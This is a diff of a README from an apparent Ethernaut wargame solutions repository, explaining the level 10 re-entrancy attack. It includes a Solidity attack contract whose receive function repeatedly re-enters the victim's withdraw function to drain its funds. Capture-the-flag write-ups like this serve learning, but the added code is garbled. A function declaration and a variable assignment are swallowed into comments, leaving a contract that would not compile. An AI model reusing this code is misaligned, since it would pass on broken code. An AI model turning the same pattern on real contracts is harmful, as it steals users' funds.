n00b21337/Ethernaut-Solutions-V2/README.md

 ```

 ## 10. Re-entrancy
-The same hack as the DAO hack.
-Due to the ordering of the transactions, the malicious contract is able to keep calling the withdraw function as the internal state is only updated after the transfer is done.
-When the call.value is processed, the control is handed back to the `fallback` function of the malicious contract which then calls the withdraw function again.
-Note that the number of times the fallback function runs is based on the amount of gas submitted when you call `maliciousWithdraw()`.
+This is the same exploit that led to the [DAO hack](https://www.coindesk.com/learn/2016/06/25/understanding-the-dao-attack/).
+Due to the ordering of the functions in the victim contract (sending funds before updating internal state), the malicious contract is able to keep calling the `withdraw` function as the internal state is only updated after the transfer is done.

-Note: You need to use `uint256` instead of `uint` when encoding the signature.
+When `msg.sender.call{value:_amount}("")` is processed, the control is handed back to the `receive` function of the malicious contract which then calls the `withdraw` function again.
+This is how the malicious contract is able to siphon all the funds.

+There are 2 things to note:

+1. The gas limited specified when calling the `maliciousWithdraw` function will determine how many times the reentracy call can happen.

+2. You may need to manually increase the gas limit in the metamask prompt otherwise the reentrancy calls will not have enough gas to succeed.
 ```
-pragma solidity ^0.6.0;
+pragma solidity ^0.8.0;

 contract AttackReentrancy {
     address payable victim;
+    uint256 targetAmount = 0.001 ether; // This is the amount that the victim contract was seeded with.

-    constructor(address payable _victim) public payable {
+    constructor(address payable _victim) public {
         victim = _victim;

-        // Call Donate
+    }

+    // Don't forget to specify 1000000000000000 wei if calling this via remix! function donate() public payable {
+        require(msg.value == targetAmount, "Please call donate with 0.001 ETH.");
         bytes memory payload = abi.encodeWithSignature("donate(address)", address(this));
-        victim.call.value(msg.value)(payload);
+        (bool success, ) = victim.call{value: targetAmount}(payload);
+        require(success, "Transaction call using encodeWithSignature is successful");
     }

-    function maliciousWithdraw() public payable {
+    function maliciousWithdraw() public {
-        // Call withdraw
-        bytes memory payload = abi.encodeWithSignature("withdraw(uint256)", 0.5 ether);
+        bytes memory payload = abi.encodeWithSignature("withdraw(uint256)", targetAmount);
         victim.call(payload);
     }

-    fallback() external payable {
+    receive() external payable {
+        // This attack contract has a malicious receive fallback function
+        // that calls maliciousWithdraw again which calls withdraw!
+        // This is how the reentrancy attack works. uint256 balance = victim.balance;
+        if (balance >= targetAmount) {
             maliciousWithdraw();
         }
+    }

     function withdraw() public {
-        msg.sender.transfer(address(this).balance);
+        payable(msg.sender).transfer(address(this).balance);
     }
 }
 ```